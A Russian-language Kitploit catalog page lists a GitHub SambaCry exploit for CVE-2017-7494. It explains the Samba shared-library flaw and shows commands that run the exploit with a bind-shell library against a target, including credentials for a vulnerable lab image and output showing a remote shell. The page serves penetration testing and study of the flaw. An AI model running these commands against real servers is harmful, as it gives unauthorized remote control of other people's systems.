Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/00mjk/exploit-cve-2017-7494
Vulnerability AnalysisExploitationPenetration TestingRemote Access ToolPayload Development
GitHub00mjk/exploit-cve-2017-7494

exploit-CVE-2017-7494

SambaCry exploit (CVE-2017-7494)

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SambaCry RCE-эксплойт для Samba 4.5.9

Samba - это свободная программная реализация сетевого протокола SMB/CIFS. Samba предоставляет файловые и печатные услуги для различных клиентов Microsoft Windows и может интегрироваться с доменом Microsoft Windows Server, либо как контроллер домена (DC), либо как член домена. Начиная с версии 4, он поддерживает Active Directory и домены Microsoft Windows NT.

Samba версии 4.5.9 и более ранние уязвимы для удаленной уязвимости выполнения кода под названием SambaCry. CVE-2017-7494 позволяет удаленным аутентифицированным пользователям загружать общую библиотеку в доступную для записи общую папку и проводить атаки выполнения кода для захвата контроля над серверами, на которых работают уязвимые службы Samba.

Samba 3.x после 3.5.0 и 4.x до 4.4.14, 4.5.x до 4.5.10, и 4.6.x до 4.6.4 не ограничивает путь к файлу при использовании именованных каналов Windows, что позволяет удаленным аутентифицированным пользователям загружать общую библиотеку в доступную для записи общую папку и выполнять произвольный код через специально созданный именованный канал.

Эксплойт

Используйте poetry для настройки окружения для этого эксплойта

root@kitploit:~
pip3 install -r requirements.txt

После этого вы можете запустить его следующим образом:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s <share> -r <location>/libbindshell-samba.so \
             -u <user> -p <password> -P 6699

Например, если вы используете уязвимый образ из vulnerables/cve-2017-7494 и хотите запустить этот эксплойт против него:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699

И вы получите следующий вывод

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>

Благодарности

Полезная нагрузка для этого проекта, а также код были в значительной степени вдохновлены opsxcq/exploit-CVE-2017-7494.

Скачать инструмент